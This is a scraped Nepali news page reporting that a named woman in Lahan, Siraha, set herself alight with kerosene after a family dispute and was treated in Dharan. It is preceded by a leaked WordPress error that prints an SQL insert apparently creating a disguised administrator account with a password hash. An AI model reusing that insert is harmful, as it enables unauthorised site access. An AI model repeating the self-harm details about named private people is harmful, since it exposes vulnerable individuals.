WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BlhEp.4aQT1bOTf8Flz17gz.ZEaHpy1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 08:47:44', '', 'admlnlx', 'admlnlx')
सिरहाको लहान नगरपालिका–४ मा एक महिलाले आफ्नै शरीरमा मट्टितेल खन्याइ मंगलबार आगो लगाएकी छन् ।सासूसँग विवाद भएको निहुँमा लहान–४ निवासी ३६ वर्षीया प्रीतिकुमारी कर्णको शरीरमा आगो लागेको देखेपछि पति सरोजकुमारले उनको उद्धार गरी उपचारका लागि लहानस्थित सप्तऋषि हस्पिटल लहान पुर्याएका थिए ।
गम्भीर घाइते भएकी कर्णलाई थप उपचारका लागि बीपी कोइराला स्वास्थ्य विज्ञान प्रतिष्ठान धरान पठाइएको इलाका प्रहरी कार्यालय, लहानले जनाएको छ ।आगो निभाउनेक्रममा सरोजको हातमासमेत पोलेकाले सोही प्रतिष्ठानमा उपचार भइरहेको प्रहरीले जनाएको छ । रासस